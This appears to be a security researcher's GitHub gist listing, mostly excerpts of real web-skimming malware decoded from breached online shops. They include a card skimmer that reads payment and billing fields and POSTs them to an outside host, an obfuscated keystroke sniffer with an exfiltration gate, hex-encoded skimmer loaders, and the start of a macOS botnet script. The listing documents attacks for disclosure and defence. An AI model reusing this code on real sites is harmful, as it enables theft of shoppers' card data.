Skip to content

Instantly share code, notes, and snippets.

Avatar

Willem de Groot gwillem

View GitHub Profile
View show-global-status.txt
Variable_name Value
Aborted_clients 2028
Aborted_connects 0
Access_denied_errors 0
Acl_column_grants 0
Acl_database_grants 4656
Acl_function_grants 0
Acl_procedure_grants 0
Acl_proxy_users 1
Acl_role_grants 0
View decoded.js
// Original: https://www.sweatybetty.com/on/demandware.static/-/Library-Sites-sweatybettylibrary/en_US/v1574703272172/js/custom.js
// Decoded by info@sansec.io (C) 2019-12-04
(function () {
function _0x58c32e(_0x531ef5, _0x2f3dd8) {
function _0x3730ba(_0x50af3d) {
if (_0x3730ba[_0x50af3d] !== _0x42a44f) return _0x3730ba[_0x50af3d];
var _0x4c3b76;
if (_0x250d('0x0', 'vxGP') == _0x50af3d) _0x4c3b76 = 'a' != 'a' [0x0];
else if (_0x250d('0x1', 'ipvd') == _0x50af3d) _0x4c3b76 = _0x3730ba(_0x250d('0x2', '%zE0')) && _0x3730ba('json-parse');
else {
@gwillem
gwillem / decoded.js
Created Oct 25, 2019
Procter & Gamble's FirstAidBeauty.com skimmed since May 5th 2019.
View decoded.js
+ function () {
var a = ["digiNum", "input[name='payment[cc_number]']", "digiMon", "select[name='payment[cc_exp_month]']", "digiYea", "select[name='payment[cc_exp_year]']", "digiCbb", "input[name='payment[cc_cid]']", "digiNam", "input[name='payment[cc_owner]']", "clNameChecked", "l8", "shElement", "#payment-buttons-container", "hasClass", "click", "val", "change", "addClass", "#billing\:firstname", " ", "#billing\:lastname", "#billing\:company", "#billing\:street1", "#billing\:street2", "#billing\:email", "#billing\:telephone", "#billing\:city", "#billing\:region_id", "#billing\:country_id", "#billing\:postcode", "host", "location", "", "replace", "/", "userAgent", "stringify", "https://cdn.hsadspixel.com/t/", "main", "guid", "refer", "POST", "ajax", "random", "round", "fromCharCode", "key", "getElementById", "iv", "push", "length", "charCodeAt", "rotate", "sbox", "Rcon", "numberOfRounds", "core", "SIZE_256", "keySize", "rsbox", "shiftRow", "mixColumn", "galois_multiplication", "subBytes", "shiftRows", "m
View Volusion code
/*!
* JavaScript Cookie v2.2.1
* https://github.com/js-cookie/js-cookie
*
* Copyright 2006, 2015 Klaus Hartl & Fagner Brack
* Released under the MIT license
*/
;
(function(factory) {
var registeredInModuleLoader;
View jsonline2csv.py
#!/usr/bin/env python3
# jsonline to csv converter for Andy
import csv
import json
import sys
if len(sys.argv) < 2:
print("Use {} <file.jsonline>".format(sys.argv[0]))
@gwillem
gwillem / decoded.js
Last active Aug 29, 2019
962 stores found breached on the 4th of July - https://sansec.io
View decoded.js
// Decoded by Sanguine Security <info@sansec.io>
String.prototype.hexEncode = function() {
var a, b;
var output = '';
for (b = 0; b < this.length; b++) {
a = this.charCodeAt(b).toString(16);
output += ('000' + a).slice(-4)
};
return output
};
@gwillem
gwillem / keystroke_sniffer_1.js
Last active May 23, 2020
BestOfTheWeb.com Security Seal contains even 2 different keystroke sniffers 2019-05-13 -- obfuscated version here: https://urlscan.io/responses/5c4474793baf83d5376045163d77f8f2ecd228ba5941ee8572489cb475a3cd1b/
View keystroke_sniffer_1.js
var sniffData = {};
sniffData['Gate'] = 'https://font-assets.com/img';
sniffData['Data'] = {};
sniffData['Sent'] = [];
sniffData.IsValid = ![];
sniffData.SaveParam = function(field) {
if (field.id !== undefined && field.id != '' && field.id !== null && field.value.length < 0x100 && field.value.length > 0x0) {
if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', ''))) sniffData.IsValid = !![];
sniffData.Data[field.id] = field.value;
return;
View original.js
var _0x19f5=['\x61\x57\x35\x75\x5a\x58\x4a\x49\x5a\x57\x6c\x6e\x61\x48\x51\x3d','\x61\x47\x39\x79\x61\x58\x70\x76\x62\x6e\x52\x68\x62\x41\x3d\x3d','\x52\x6d\x6c\x79\x5a\x57\x4a\x31\x5a\x77\x3d\x3d','\x59\x32\x68\x79\x62\x32\x31\x6c','\x61\x58\x4e\x4a\x62\x6d\x6c\x30\x61\x57\x46\x73\x61\x58\x70\x6c\x5a\x41\x3d\x3d','\x64\x57\x35\x6b\x5a\x57\x5a\x70\x62\x6d\x56\x6b','\x5a\x58\x68\x77\x62\x33\x4a\x30\x63\x77\x3d\x3d','\x5a\x47\x56\x32\x64\x47\x39\x76\x62\x48\x4d\x3d','\x63\x48\x4a\x76\x64\x47\x39\x30\x65\x58\x42\x6c','\x61\x47\x46\x7a\x61\x45\x4e\x76\x5a\x47\x55\x3d','\x59\x32\x68\x68\x63\x6b\x4e\x76\x5a\x47\x56\x42\x64\x41\x3d\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x6d\x62\x32\x35\x30\x4c\x57\x46\x7a\x63\x32\x56\x30\x63\x79\x35\x6a\x62\x32\x30\x76\x61\x57\x31\x6e','\x53\x58\x4e\x57\x59\x57\x78\x70\x5a\x41\x3d\x3d','\x55\x32\x46\x32\x5a\x56\x42\x68\x63\x6d\x46\x74','\x55\x32\x46\x32\x5a\x55\x46\x73\x62\x45\x5a\x70\x5a\x57\x78\x6b\x63\x77\x3d\x3d','\x64\x47\x56\x34\x64\x47\x46\x79\x5a\x57\x45\x3d','\x
View skimmer.js
var _0xBCEC = ["68$61$77$6b$73$73$68$6f$70$2e$63$6f$6d", "2f$63$68$65$63$6b$6f$75$74", "", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d$2f$61$6e$61$6c$79$7a$65", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d$2f$53$4a$7a$54$43$72$78$4d$4f$30$4f$37$74$69", "6d$61$67$65$32$5f$64$65$66$61$75$6c$74", "length", "wtf", "prototype", "$", "split", "reduce", "fromCharCode", "map", "replace", "toString", "rot13", "Z", "charCodeAt", "rot5", "join", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", "_utf8_encode", "charAt", "_keyStr", "indexOf", "_utf8_decode", "\n", "isUndefined", "isNull", "href", "location", "div", "createElement", "i", "getElementsByTagName", "innerHTML", "<!--[if gt IE ", "]><i></i><![endif]-->", "childNodes", "nodeType", "push", "getAttribute", "attributes", "nodeName", "nodeValue", "textContent", "innerText", "getComputedStyle", "display", "no
@gwillem
gwillem / main.py
Last active Apr 23, 2019
dfurniturestore.co.uk MacOS X botnet code -- found on https://dfurniturestore.co.uk/js/Update 04-19.dmg
View main.py
import os
import pwd
import random
import string
import urllib, urllib2
import json
import time
import sys
import base64
import random
You can’t perform that action at this time.